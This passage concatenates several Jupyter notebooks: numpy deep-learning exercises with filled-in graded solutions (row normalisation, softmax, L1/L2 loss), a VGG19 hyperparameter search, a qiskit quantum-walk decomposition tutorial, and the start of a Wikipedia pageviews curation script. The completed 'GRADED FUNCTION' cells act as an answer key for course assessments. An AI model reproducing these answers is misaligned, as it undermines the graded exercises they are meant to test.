[ 0.85304703, 0.52351845],
[ 0.19981397, 0.27417313]],
[[ 0.60659855, 0.00533165],
[ 0.10820313, 0.49978937],
[ 0.34144279, 0.94630077]]])
print ("image2vector(image) = " + str(image2vector(image)))
###Output
image2vector(image) = [[0.67826139]
[0.29380381]
[0.90714982]
[0.52835647]
[0.4215251 ]
[0.45017551]
[0.92814219]
[0.96677647]
[0.85304703]
[0.52351845]
[0.19981397]
[0.27417313]
[0.60659855]
[0.00533165]
[0.10820313]
[0.49978937]
[0.34144279]
[0.94630077]]
###Markdown
**Expected Output**: **image2vector(image)** [[ 0.67826139] [ 0.29380381] [ 0.90714982] [ 0.52835647] [ 0.4215251 ] [ 0.45017551] [ 0.92814219] [ 0.96677647] [ 0.85304703] [ 0.52351845] [ 0.19981397] [ 0.27417313] [ 0.60659855] [ 0.00533165] [ 0.10820313] [ 0.49978937] [ 0.34144279] [ 0.94630077]] 1.4 - Normalizing rowsAnother common technique we use in Machine Learning and Deep Learning is to normalize our data. It often leads to a better performance because gradient descent converges faster after normalization. Here, by normalization we mean changing x to $ \frac{x}{\| x\|} $ (dividing each row vector of x by its norm).For example, if $$x = \begin{bmatrix} 0 & 3 & 4 \\ 2 & 6 & 4 \\\end{bmatrix}\tag{3}$$ then $$\| x\| = np.linalg.norm(x, axis = 1, keepdims = True) = \begin{bmatrix} 5 \\ \sqrt{56} \\\end{bmatrix}\tag{4} $$and $$ x\_normalized = \frac{x}{\| x\|} = \begin{bmatrix} 0 & \frac{3}{5} & \frac{4}{5} \\ \frac{2}{\sqrt{56}} & \frac{6}{\sqrt{56}} & \frac{4}{\sqrt{56}} \\\end{bmatrix}\tag{5}$$ Note that you can divide matrices of different sizes and it works fine: this is called broadcasting and you're going to learn about it in part 5.**Exercise**: Implement normalizeRows() to normalize the rows of a matrix. After applying this function to an input matrix x, each row of x should be a vector of unit length (meaning length 1).
###Code
# GRADED FUNCTION: normalizeRows
def normalizeRows(x):
"""
Implement a function that normalizes each row of the matrix x (to have unit length).
Argument:
x -- A numpy matrix of shape (n, m)
Returns:
x -- The normalized (by row) numpy matrix. You are allowed to modify x.
"""
### START CODE HERE ### (≈ 2 lines of code)
# Compute x_norm as the norm 2 of x. Use np.linalg.norm(..., ord = 2, axis = ..., keepdims = True)
x_norm = np.linalg.norm(x, ord = 2, axis = 1, keepdims = True)
# Divide x by its norm.
x = x / x_norm
### END CODE HERE ###
return x
x = np.array([
[0, 3, 4],
[1, 6, 4]])
print("normalizeRows(x) = " + str(normalizeRows(x)))
###Output
normalizeRows(x) = [[0. 0.6 0.8 ]
[0.13736056 0.82416338 0.54944226]]
###Markdown
**Expected Output**: **normalizeRows(x)** [[ 0. 0.6 0.8 ] [ 0.13736056 0.82416338 0.54944226]] **Note**:In normalizeRows(), you can try to print the shapes of x_norm and x, and then rerun the assessment. You'll find out that they have different shapes. This is normal given that x_norm takes the norm of each row of x. So x_norm has the same number of rows but only 1 column. So how did it work when you divided x by x_norm? This is called broadcasting and we'll talk about it now! 1.5 - Broadcasting and the softmax function A very important concept to understand in numpy is "broadcasting". It is very useful for performing mathematical operations between arrays of different shapes. For the full details on broadcasting, you can read the official [broadcasting documentation](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html). **Exercise**: Implement a softmax function using numpy. You can think of softmax as a normalizing function used when your algorithm needs to classify two or more classes. You will learn more about softmax in the second course of this specialization.**Instructions**:- $ \text{for } x \in \mathbb{R}^{1\times n} \text{, } softmax(x) = softmax(\begin{bmatrix} x_1 && x_2 && ... && x_n \end{bmatrix}) = \begin{bmatrix} \frac{e^{x_1}}{\sum_{j}e^{x_j}} && \frac{e^{x_2}}{\sum_{j}e^{x_j}} && ... && \frac{e^{x_n}}{\sum_{j}e^{x_j}} \end{bmatrix} $ - $\text{for a matrix } x \in \mathbb{R}^{m \times n} \text{, $x_{ij}$ maps to the element in the $i^{th}$ row and $j^{th}$ column of $x$, thus we have: }$ $$softmax(x) = softmax\begin{bmatrix} x_{11} & x_{12} & x_{13} & \dots & x_{1n} \\ x_{21} & x_{22} & x_{23} & \dots & x_{2n} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ x_{m1} & x_{m2} & x_{m3} & \dots & x_{mn}\end{bmatrix} = \begin{bmatrix} \frac{e^{x_{11}}}{\sum_{j}e^{x_{1j}}} & \frac{e^{x_{12}}}{\sum_{j}e^{x_{1j}}} & \frac{e^{x_{13}}}{\sum_{j}e^{x_{1j}}} & \dots & \frac{e^{x_{1n}}}{\sum_{j}e^{x_{1j}}} \\ \frac{e^{x_{21}}}{\sum_{j}e^{x_{2j}}} & \frac{e^{x_{22}}}{\sum_{j}e^{x_{2j}}} & \frac{e^{x_{23}}}{\sum_{j}e^{x_{2j}}} & \dots & \frac{e^{x_{2n}}}{\sum_{j}e^{x_{2j}}} \\ \vdots & \vdots & \vdots & \ddots & \vdots \\ \frac{e^{x_{m1}}}{\sum_{j}e^{x_{mj}}} & \frac{e^{x_{m2}}}{\sum_{j}e^{x_{mj}}} & \frac{e^{x_{m3}}}{\sum_{j}e^{x_{mj}}} & \dots & \frac{e^{x_{mn}}}{\sum_{j}e^{x_{mj}}}\end{bmatrix} = \begin{pmatrix} softmax\text{(first row of x)} \\ softmax\text{(second row of x)} \\ ... \\ softmax\text{(last row of x)} \\\end{pmatrix} $$
###Code
# GRADED FUNCTION: softmax
def softmax(x):
"""Calculates the softmax for each row of the input x.
Your code should work for a row vector and also for matrices of shape (n, m).
Argument:
x -- A numpy matrix of shape (n,m)
Returns:
s -- A numpy matrix equal to the softmax of x, of shape (n,m)
"""
### START CODE HERE ### (≈ 3 lines of code)
# Apply exp() element-wise to x. Use np.exp(...).
x_exp = np.exp(x)
# Create a vector x_sum that sums each row of x_exp. Use np.sum(..., axis = 1, keepdims = True).
x_sum = np.sum(x_exp, axis = 1, keepdims = True)
# Compute softmax(x) by dividing x_exp by x_sum. It should automatically use numpy broadcasting.
s = x_exp/x_sum
### END CODE HERE ###
return s
x = np.array([
[9, 2, 5, 0, 0],
[7, 5, 0, 0 ,0]])
print("softmax(x) = " + str(softmax(x)))
###Output
softmax(x) = [[9.80897665e-01 8.94462891e-04 1.79657674e-02 1.21052389e-04
1.21052389e-04]
[8.78679856e-01 1.18916387e-01 8.01252314e-04 8.01252314e-04
8.01252314e-04]]
###Markdown
**Expected Output**: **softmax(x)** [[ 9.80897665e-01 8.94462891e-04 1.79657674e-02 1.21052389e-04 1.21052389e-04] [ 8.78679856e-01 1.18916387e-01 8.01252314e-04 8.01252314e-04 8.01252314e-04]] **Note**:- If you print the shapes of x_exp, x_sum and s above and rerun the assessment cell, you will see that x_sum is of shape (2,1) while x_exp and s are of shape (2,5). **x_exp/x_sum** works due to python broadcasting.Congratulations! You now have a pretty good understanding of python numpy and have implemented a few useful functions that you will be using in deep learning. **What you need to remember:**- np.exp(x) works for any np.array x and applies the exponential function to every coordinate- the sigmoid function and its gradient- image2vector is commonly used in deep learning- np.reshape is widely used. In the future, you'll see that keeping your matrix/vector dimensions straight will go toward eliminating a lot of bugs. - numpy has efficient built-in functions- broadcasting is extremely useful 2) Vectorization In deep learning, you deal with very large datasets. Hence, a non-computationally-optimal function can become a huge bottleneck in your algorithm and can result in a model that takes ages to run. To make sure that your code is computationally efficient, you will use vectorization. For example, try to tell the difference between the following implementations of the dot/outer/elementwise product.
###Code
import time
x1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]
x2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]
### CLASSIC DOT PRODUCT OF VECTORS IMPLEMENTATION ###
tic = time.process_time()
dot = 0
for i in range(len(x1)):
dot+= x1[i]*x2[i]
toc = time.process_time()
print ("dot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC OUTER PRODUCT IMPLEMENTATION ###
tic = time.process_time()
outer = np.zeros((len(x1),len(x2))) # we create a len(x1)*len(x2) matrix with only zeros
for i in range(len(x1)):
for j in range(len(x2)):
outer[i,j] = x1[i]*x2[j]
toc = time.process_time()
print ("outer = " + str(outer) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC ELEMENTWISE IMPLEMENTATION ###
tic = time.process_time()
mul = np.zeros(len(x1))
for i in range(len(x1)):
mul[i] = x1[i]*x2[i]
toc = time.process_time()
print ("elementwise multiplication = " + str(mul) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC GENERAL DOT PRODUCT IMPLEMENTATION ###
W = np.random.rand(3,len(x1)) # Random 3*len(x1) numpy array
tic = time.process_time()
gdot = np.zeros(W.shape[0])
for i in range(W.shape[0]):
for j in range(len(x1)):
gdot[i] += W[i,j]*x1[j]
toc = time.process_time()
print ("gdot = " + str(gdot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
x1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]
x2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]
### VECTORIZED DOT PRODUCT OF VECTORS ###
tic = time.process_time()
dot = np.dot(x1,x2)
toc = time.process_time()
print ("dot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED OUTER PRODUCT ###
tic = time.process_time()
outer = np.outer(x1,x2)
toc = time.process_time()
print ("outer = " + str(outer) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED ELEMENTWISE MULTIPLICATION ###
tic = time.process_time()
mul = np.multiply(x1,x2)
toc = time.process_time()
print ("elementwise multiplication = " + str(mul) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED GENERAL DOT PRODUCT ###
tic = time.process_time()
dot = np.dot(W,x1)
toc = time.process_time()
print ("gdot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
###Output
dot = 278
----- Computation time = 0.0ms
outer = [[81 18 18 81 0 81 18 45 0 0 81 18 45 0 0]
[18 4 4 18 0 18 4 10 0 0 18 4 10 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[63 14 14 63 0 63 14 35 0 0 63 14 35 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[81 18 18 81 0 81 18 45 0 0 81 18 45 0 0]
[18 4 4 18 0 18 4 10 0 0 18 4 10 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]
----- Computation time = 0.0ms
elementwise multiplication = [81 4 10 0 0 63 10 0 0 0 81 4 25 0 0]
----- Computation time = 0.0ms
gdot = [15.96663552 28.92073296 25.01593558]
----- Computation time = 0.0ms
###Markdown
As you may have noticed, the vectorized implementation is much cleaner and more efficient. For bigger vectors/matrices, the differences in running time become even bigger. **Note** that `np.dot()` performs a matrix-matrix or matrix-vector multiplication. This is different from `np.multiply()` and the `*` operator (which is equivalent to `.*` in Matlab/Octave), which performs an element-wise multiplication. 2.1 Implement the L1 and L2 loss functions**Exercise**: Implement the numpy vectorized version of the L1 loss. You may find the function abs(x) (absolute value of x) useful.**Reminder**:- The loss is used to evaluate the performance of your model. The bigger your loss is, the more different your predictions ($ \hat{y} $) are from the true values ($y$). In deep learning, you use optimization algorithms like Gradient Descent to train your model and to minimize the cost.- L1 loss is defined as:$$\begin{align*} & L_1(\hat{y}, y) = \sum_{i=0}^m|y^{(i)} - \hat{y}^{(i)}| \end{align*}\tag{6}$$
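Before implementing the losses, here is a tiny side-by-side of the two products (an illustrative addition, not part of the graded assignment):
###Code
# Illustrative addition: np.dot contracts dimensions, while np.multiply and * act element-wise
a = np.array([1, 2, 3])
b = np.array([4, 5, 6])
print(np.dot(a, b)) # 1*4 + 2*5 + 3*6 = 32
print(np.multiply(a, b)) # [ 4 10 18]
print(a * b) # same as np.multiply
###Output
_____no_output_____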
###Code
# GRADED FUNCTION: L1
def L1(yhat, y):
"""
Arguments:
yhat -- vector of size m (predicted labels)
y -- vector of size m (true labels)
Returns:
loss -- the value of the L1 loss function defined above
"""
### START CODE HERE ### (≈ 1 line of code)
loss = np.sum(abs(y - yhat))
### END CODE HERE ###
return loss
yhat = np.array([.9, 0.2, 0.1, .4, .9])
y = np.array([1, 0, 0, 1, 1])
print("L1 = " + str(L1(yhat,y)))
###Output
L1 = 1.1
###Markdown
**Expected Output**: **L1** 1.1 **Exercise**: Implement the numpy vectorized version of the L2 loss. There are several way of implementing the L2 loss but you may find the function np.dot() useful. As a reminder, if $x = [x_1, x_2, ..., x_n]$, then `np.dot(x,x)` = $\sum_{j=0}^n x_j^{2}$. - L2 loss is defined as $$\begin{align*} & L_2(\hat{y},y) = \sum_{i=0}^m(y^{(i)} - \hat{y}^{(i)})^2 \end{align*}\tag{7}$$
###Code
# GRADED FUNCTION: L2
def L2(yhat, y):
"""
Arguments:
yhat -- vector of size m (predicted labels)
y -- vector of size m (true labels)
Returns:
loss -- the value of the L2 loss function defined above
"""
### START CODE HERE ### (≈ 1 line of code)
loss = np.sum(np.square(y-yhat))
### END CODE HERE ###
return loss
yhat = np.array([.9, 0.2, 0.1, .4, .9])
y = np.array([1, 0, 0, 1, 1])
print("L2 = " + str(L2(yhat,y)))
###Output
L2 = 0.43
|
code/VGG19Optimization_2.ipynb | ###Markdown
First we will read in the csv's so we can see some more information on the filenames and breeds
###Code
# df_train = pd.read_csv('../input/labels.csv')
# df_test = pd.read_csv('../input/sample_submission.csv')
# print('Training images: ',df_train.shape[0])
# print('Test images: ',df_test.shape[0])
# reduce dimensionality
#df_train = df_train.head(100)
#df_test = df_test.head(100)
#df_train.head(10)
###Output
_____no_output_____
###Markdown
We can see that the breed needs to be one-hot encoded for the final submission, so we will now do this.
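As a minimal illustration of what this encoding produces (an addition with made-up breed labels, since the original cells below are commented out):
###Code
# Illustrative addition: one-hot encoding with pandas on hypothetical labels;
# assumes pandas is already imported as pd, as in the commented cells below
demo_breeds = pd.Series(['beagle', 'pug', 'beagle'])
print(pd.get_dummies(demo_breeds))
###Output
_____no_output_____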
###Code
# targets_series = pd.Series(df_train['breed'])
# one_hot = pd.get_dummies(targets_series, sparse = True)
# one_hot_labels = np.asarray(one_hot)
###Output
_____no_output_____
###Markdown
Next we will read in all of the images for test and train, using a for loop through the values of the csv files. I have also set an im_size variable which sets the size for the image to be re-sized to, 90x90 px, you should play with this number to see how it affects accuracy.
###Code
# im_size = 90
# x_train = []
# y_train = []
# x_test = []
# i = 0
# for f, breed in tqdm(df_train.values[:10]):
# img = cv2.imread('../input/train/{}.jpg'.format(f))
# label = one_hot_labels[i]
# x_train.append(cv2.resize(img, (im_size, im_size)))
# y_train.append(label)
# i += 1
# for f in tqdm(df_test['id'].values):
# img = cv2.imread('../input/test/{}.jpg'.format(f))
# x_test.append(cv2.resize(img, (im_size, im_size)))
# y_train_raw = np.array(y_train, np.uint8)
# x_train_raw = np.array(x_train, np.float32) / 255.
# x_test = np.array(x_test, np.float32) / 255.
###Output
_____no_output_____
###Markdown
We check the shape of the outputs to make sure everyting went as expected.
###Code
# print(x_train_raw.shape)
# print(y_train_raw.shape)
# print(x_test.shape)
###Output
_____no_output_____
###Markdown
We can see above that there are 120 different breeds. We can put this in a num_class variable below that can then be used when creating the CNN model.
###Code
# num_class = y_train_raw.shape[1]
# print('Number of classes: ', num_class)
###Output
_____no_output_____
###Markdown
It is important to create a validation set so that you can gauge the performance of your model on independent data, unseen by the model in training. We do this by splitting the current training set (x_train_raw) and the corresponding labels (y_train_raw) so that we set aside 30% of the data at random and put these in validation sets (X_valid and Y_valid).* This split needs to be improved so that it contains images from every class; with 120 separate classes, some may not be represented, and so the validation score is not informative. A stratified alternative is sketched after the next cell.
###Code
# X_train, X_valid, Y_train, Y_valid = train_test_split(x_train_raw, y_train_raw, test_size=validation_size, random_state=1)
###Output
_____no_output_____
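###Markdown
One way to address that caveat is a stratified split, so every breed appears in both sets. The commented cell below is a sketch rather than the original author's code; it assumes the labels are one-hot rows, from which argmax recovers a class id.
###Code
# Sketch (added): stratified split to keep all 120 classes represented
# X_train, X_valid, Y_train, Y_valid = train_test_split(
#     x_train_raw, y_train_raw,
#     test_size=validation_size, random_state=1,
#     stratify=y_train_raw.argmax(axis=1)) # class id recovered from the one-hot labels
###Output
_____no_output_____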
###Markdown
Now we build the CNN architecture. Here we are using a pre-trained model, VGG19, which has already been trained to identify many different dog breeds (as well as a lot of other objects from the ImageNet dataset; see here for more information: http://image-net.org/about-overview). Unfortunately, it doesn't seem possible to download the weights from within this kernel, so make sure you set the weights argument to 'imagenet' and not None. We then remove the final layer and replace it with a single dense layer with the number of nodes corresponding to the number of breed classes we have (120).
###Code
def data():
print('Getting data')
df_train = pd.read_csv('../input/labels.csv')
df_test = pd.read_csv('../input/sample_submission.csv')
targets_series = pd.Series(df_train['breed'])
one_hot = pd.get_dummies(targets_series, sparse = True)
one_hot_labels = np.asarray(one_hot)
im_size = 90
x_train = []
y_train = []
x_test = []
i = 0
for f, breed in tqdm(df_train.values):
img = cv2.imread('../input/train/{}.jpg'.format(f))
label = one_hot_labels[i]
x_train.append(cv2.resize(img, (im_size, im_size)))
y_train.append(label)
i += 1
y_train_raw = np.array(y_train, np.uint8)
x_train_raw = np.array(x_train, np.float32) / 255.
num_class = y_train_raw.shape[1]
print('Splitting into training/validation')
X_train, X_valid, Y_train, Y_valid = train_test_split(x_train_raw, y_train_raw, test_size=0.3, random_state=1)
return X_train, Y_train, X_valid, Y_valid
# prepare data and model for hyperas
def model(X_train,Y_train,X_valid,Y_valid):
    print('Creating model')
    # Defined locally because hyperas compiles this function in isolation,
    # so notebook-level globals such as im_size and num_class are not visible here
    im_size = 90 # must match the resize used in data()
    num_class = Y_train.shape[1] # number of breed classes
    base_model = VGG19(weights = 'imagenet',
                    include_top=False,
                    input_shape=(im_size, im_size, 3))
    dropout = {{uniform(0.5,1)}}
    layers = {{choice([0,1,2])}}
    dontFreeze = {{choice(list(range(5+1)))}}
    batchSize = {{choice([16,64,256])}}
print()
print('dropout=',dropout)
print('layers=',layers)
print('dontFreeze=',dontFreeze)
print('batchSize=',batchSize)
print()
    stepsPerEpoch = round(len(X_train) / batchSize)
# Add a new top layer
x = base_model.output
x = Flatten()(x)
x = Dropout(dropout)(x)
if layers>=2:
x = Dense(1024,activation='relu')(x)
if layers>=1:
x = Dense(512,activation='relu')(x)
# in any case:
predictions = Dense(num_class, activation='softmax')(x)
# This is the model we will train
model = Model(inputs=base_model.input, outputs=predictions)
# First: train only the top layers (which were randomly initialized)
for i in range(len(base_model.layers)-dontFreeze):
base_model.layers[i].trainable = False
# predetermined optimizer
    lr = 0.00020389590556056983
    beta_1 = 0.9453158868247398
    beta_2 = 0.9925872692991417
    decay = 0.000821336141287018
adam = keras.optimizers.Adam(lr=lr,beta_1=beta_1,beta_2=beta_2,decay=decay)
model.compile(loss='categorical_crossentropy',
optimizer=adam,
metrics=['accuracy'])
    callbacks_list = []
    callbacks_list.append(keras.callbacks.EarlyStopping(
        monitor='val_acc',
        patience=10,
        verbose=1))
# data augmentation & fitting
datagen = ImageDataGenerator(
rotation_range=30,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.5,
zoom_range=0.5,
horizontal_flip=True,
        vertical_flip=True)
model.fit_generator(
datagen.flow(X_train,Y_train,batch_size=batchSize),
steps_per_epoch=stepsPerEpoch,
epochs=150,
verbose=1,
validation_data=(X_valid,Y_valid),
workers=2,
shuffle=True,
callbacks=callbacks_list)
# model.fit(X_train, Y_train,
# epochs=100,
# batch_size = batchSize,
# validation_data=(X_valid, Y_valid),
# verbose=1,
# callbacks=callbacks_list)
score, acc = model.evaluate(X_valid, Y_valid, verbose=0)
print('Test accuracy:', acc)
return {'loss': -acc, 'status': STATUS_OK, 'model': model}
best_run, best_model = optim.minimize(model=model,
data=data,
algo=tpe.suggest,
max_evals=10,
trials=Trials(),
notebook_name='VGG19Optimization_2')
X_train, Y_train, X_test, Y_test = data()
val_loss, val_acc = best_model.evaluate(X_test, Y_test)
print("Evaluation of best performing model:")
print("Validation loss: ", val_loss)
print("Validation accuracy: ", val_acc)
modelPath = 'best_vgg19_model.h5' # assumed save path; modelPath was never defined earlier in the notebook
best_model.save(modelPath)
best_model.summary()
###Output
_____no_output_____
###Markdown
Remember, accuracy is low here because we are not taking advantage of the pre-trained weights as they cannot be downloaded in the kernel. This means we are training the weights from scratch and we have only run 1 epoch due to the hardware constraints in the kernel. Next we will make our predictions.
###Code
# preds = model.predict(x_test, verbose=1)
# sub = pd.DataFrame(preds)
# # Set column names to those generated by the one-hot encoding earlier
# col_names = one_hot.columns.values
# sub.columns = col_names
# # Insert the column id from the sample_submission at the start of the data frame
# sub.insert(0, 'id', df_test['id'])
# sub.head(10)
###Output
_____no_output_____ |
tutorials/03-CircuitTranslation.ipynb | ###Markdown
Circuit Translation In this notebook we will introduce a tool of `sqwalk` that is useful to decompose (or translate) a unitary transformation (in our case the one generated by the walker's Hamiltonian) into a series of gates that can be simulated or even run on quantum hardware. The decomposition method is based on `qiskit`, thus we will need it as a dependency, in addition to our usual `SQWalker` class and some QuTiP objects. Before jumping to the tutorial, it is useful to note that this decomposition, for the sake of being general, is not optimized. Indeed, while it supports any kind of quantum computer and every kind of quantum walker, it usually takes up a lot of gates to implement the decomposition. To optimize the number of gates one must resort to specific techniques in the literature that leverage the symmetries and characteristics of particular graphs and are not general.
###Code
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import scipy
from sqwalk import SQWalker
from sqwalk import gate_decomposition
from qiskit import Aer
from qiskit.visualization import *
###Output
_____no_output_____
###Markdown
First we create the walker as we have seen in the previous notebooks and we run it for a certain time to have a reference result. In this case we have picked a time of 1000.
###Code
#Create and run the walker
graph = nx.path_graph(8)
adj = nx.adj_matrix(graph).todense()
walker = SQWalker(np.array(adj))
time_samples = 1000
initial_node = 0
result = walker.run_walker(initial_node, time_samples)
new_state = result.final_state
nodelist = [i for i in range(adj.shape[0])]
plt.bar(nodelist, new_state.diag())
plt.show()
###Output
_____no_output_____
###Markdown
Our decomposition, albeit being devised as a tool to decompose walkers, can be used with any unitary or Hamiltonian. Note that since we will use a system of $n$ qubits, our Hamiltonian has to be $2^n$ dimensional; if the problem has the wrong dimensionality, one can zero-pad it to make it work. The time we used above in `time_samples` has to be rescaled by a factor of $100$, since the timestep of the master equation in run_walker is $10^{-2}$.
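As a minimal illustration of the zero-padding mentioned above (an addition using made-up dimensions):
###Code
# Illustrative addition: zero-pad a Hamiltonian up to the next power of two;
# the 6x6 matrix here is made up
H = np.ones((6, 6)) # a 6-dimensional problem
n_qubits = int(np.ceil(np.log2(H.shape[0]))) # qubits needed to host it
dim = 2**n_qubits # target dimension (here 8)
H_padded = np.zeros((dim, dim), dtype=complex)
H_padded[:H.shape[0], :H.shape[1]] = H
print(H_padded.shape)
###Output
_____no_output_____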
###Code
#Estract the Hamiltonian from the walker
hamiltonian = walker.quantum_hamiltonian.full()
#Set the time one wants to simulate
time_rescaled = 10
#Compute the respective unitary
unitary = scipy.linalg.expm(-1j*time_rescaled*hamiltonian)
###Output
_____no_output_____
###Markdown
Now it is all set up to decompose our walker using the `gate_decomposition` function from `sqwalk`. To decompose it, it is sufficient to pass our unitary to the function, which, leveraging qiskit transpiling, will give us back the quantum circuit. The `gate_decomposition` function also accepts two more arguments:- topology: a list of connections between qubits specifying the topology of the particular hardware we want to decompose on; the default topology is fully connected.- gates: a list of allowed gates that can be used to create the decomposition; defaults to single qubit rotations and CNOT. The resulting decomposition is a qiskit circuit object that can be exported into QASM instructions to be executed on virtually every device.
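For instance, targeting a linear three-qubit device restricted to rotations and CNOT might look like the commented sketch below; the call is hypothetical, and the exact formats of the connection list and gate names are assumptions rather than something taken from the `sqwalk` documentation.
###Code
# Hypothetical sketch of the optional arguments described above;
# the value formats are assumptions
# circuit_linear = gate_decomposition(unitary,
#                                     topology=[[0, 1], [1, 2]],
#                                     gates=['rx', 'ry', 'rz', 'cx'])
###Output
_____no_output_____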
###Code
#Decompose into gates
circuit_decomp = gate_decomposition(unitary)
circuit_decomp.qasm() # port it to whatever hardware
#circuit_decomp.draw()
###Output
_____no_output_____
###Markdown
As an example we take a simulator backend from `qiskit` itself (it could be a real device instead of a simulator). We execute the decomposed circuit and plot the result.
###Code
backend=Aer.get_backend('aer_simulator')
circuit_decomp.measure_all()
result=backend.run(circuit_decomp).result()
counts = result.get_counts(circuit_decomp)
plot_histogram(counts)
###Output
_____no_output_____
###Markdown
We can see that the decomposition is perfectly consistent with the quantum walker we have simulated above with SQWalk!
###Code
###Output
_____no_output_____ |
data-512-a1/data512-a1-data-curation.ipynb | ###Markdown
Data Curation This notebook walks through all the steps for the analysis from gathering the data, processing the data and finally performing analysis by creating a visualization. Step 1: Gathering the Data The pagecounts and pageviews data are collected from their respective APIs and stored in 5 different json files depending on the different access types. Importing required libraries...
###Code
import os
import shutil
import pandas as pd
import numpy as np
import functools
import datetime
import json
import requests
%matplotlib inline
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
REST API endpoints:* [Legacy Pagecounts API](https://wikimedia.org/api/rest_v1/#/Legacy%20data)* [Pageviews API](https://wikimedia.org/api/rest_v1/#/Pageviews%20data)
###Code
endpoint_legacy = 'https://wikimedia.org/api/rest_v1/metrics/legacy/pagecounts/aggregate/{project}/{access-site}/{granularity}/{start}/{end}'
endpoint_pageviews = 'https://wikimedia.org/api/rest_v1/metrics/pageviews/aggregate/{project}/{access}/{agent}/{granularity}/{start}/{end}'
###Output
_____no_output_____
###Markdown
Creating directory structure for the data
###Code
json_output_folder = "data/json"
csv_output_folder = "data/csv"
if os.path.exists("data"):
shutil.rmtree("data")
os.mkdir("data")
os.mkdir(json_output_folder)
os.mkdir(csv_output_folder)
###Output
_____no_output_____
###Markdown
Creating the header for calling the APIs
###Code
headers = {
'User-Agent': 'https://github.com/chavi-g',
'From': '[email protected]'
}
###Output
_____no_output_____
###Markdown
Creating functions to create the parameters for the APIs.
###Code
def get_pagecount_params(access_site, start, end):
params = {
"project" : "en.wikipedia.org",
"access-site" : access_site,
"granularity" : "monthly",
"start" : start,
"end" : end
}
return params
def get_pageview_params(access, start, end):
params = {
"project" : "en.wikipedia.org",
"access" : access,
"agent" : "user",
"granularity" : "monthly",
"start" : start,
"end" : end
}
return params
###Output
_____no_output_____
###Markdown
Utility functions to call the rest APIs and store the data in files
###Code
def api_call(endpoint,parameters):
call = requests.get(endpoint.format(**parameters), headers=headers)
response = call.json()
return response
def get_json_file_path(apiname, accesstype, firstmonth, lastmonth):
filename = "{0}_{1}_{2}-{3}.json".format(apiname, accesstype, firstmonth, lastmonth)
return os.path.join(json_output_folder, filename)
def write_data_to_json(data, filename):
data_string = json.dumps(data, indent=2)
with open(filename, "w") as f:
f.write(data_string)
def get_pageviews_data(access, start, end):
pageview_data = api_call(endpoint_pageviews, get_pageview_params(access, start, end))
firstmonth = start[:6]
endmonth = end[:6]
filename = get_json_file_path('pageviews', access, firstmonth, endmonth)
write_data_to_json(pageview_data, filename)
return filename
def get_pagecounts_data(access_site, start, end):
pagecount_data = api_call(endpoint_legacy, get_pagecount_params(access_site, start, end))
firstmonth = start[:6]
endmonth = end[:6]
filename = get_json_file_path('pagecounts', access_site, firstmonth, endmonth)
write_data_to_json(pagecount_data, filename)
return filename
###Output
_____no_output_____
###Markdown
Creating json files for Pageviews API
###Code
start, end = "2015070100", "2020090100"
pageview_desktop_file = get_pageviews_data("desktop", start, end)
pageview_mobile_app_file = get_pageviews_data("mobile-app", start, end)
pageview_mobile_web_file = get_pageviews_data("mobile-web", start, end)
###Output
_____no_output_____
###Markdown
Creating json files for Legacy Pagecounts API
###Code
start, end = "2007120100", "2016070100"
pagecount_desktop_file = get_pagecounts_data("desktop-site", start, end)
pagecount_mobile_file = get_pagecounts_data("mobile-site", start, end)
###Output
_____no_output_____
###Markdown
Step 2: Processing the Data The pageview and pagecount data is processed to get counts for `mobile`, `desktop` and `all` access types. For doing this, the data for different access types are combined on the year and month values and added. For missing year data, the count is assumed to be 0 and thus not added.
###Code
def read_data_from_json(filename):
data = {}
with open(filename, "r") as f:
data = json.loads(f.read())
return data
pageview_desktop_data = read_data_from_json(pageview_desktop_file)
pageview_mobile_app_data = read_data_from_json(pageview_mobile_app_file)
pageview_mobile_web_data = read_data_from_json(pageview_mobile_web_file)
pagecount_desktop_data = read_data_from_json(pagecount_desktop_file)
pagecount_mobile_data = read_data_from_json(pagecount_mobile_file)
###Output
_____no_output_____
###Markdown
Preparing Pageview fields The following code aggregates the pageview counts to create the following output fields: `pageview_desktop_views`, `pageview_mobile_views`, `pageview_all_views`
###Code
pageview_desktop_views = pd.DataFrame(pageview_desktop_data['items'])
pageview_desktop_views['year'] = pageview_desktop_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pageview_desktop_views['month'] = pageview_desktop_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_desktop_views = pageview_desktop_views[['year', 'month', 'views']]
pageview_desktop_views.head()
pageview_mobile_app_views = pd.DataFrame(pageview_mobile_app_data['items'])
pageview_mobile_app_views['year'] = pageview_mobile_app_views.apply(lambda row: row['timestamp'][:4], axis = 1)
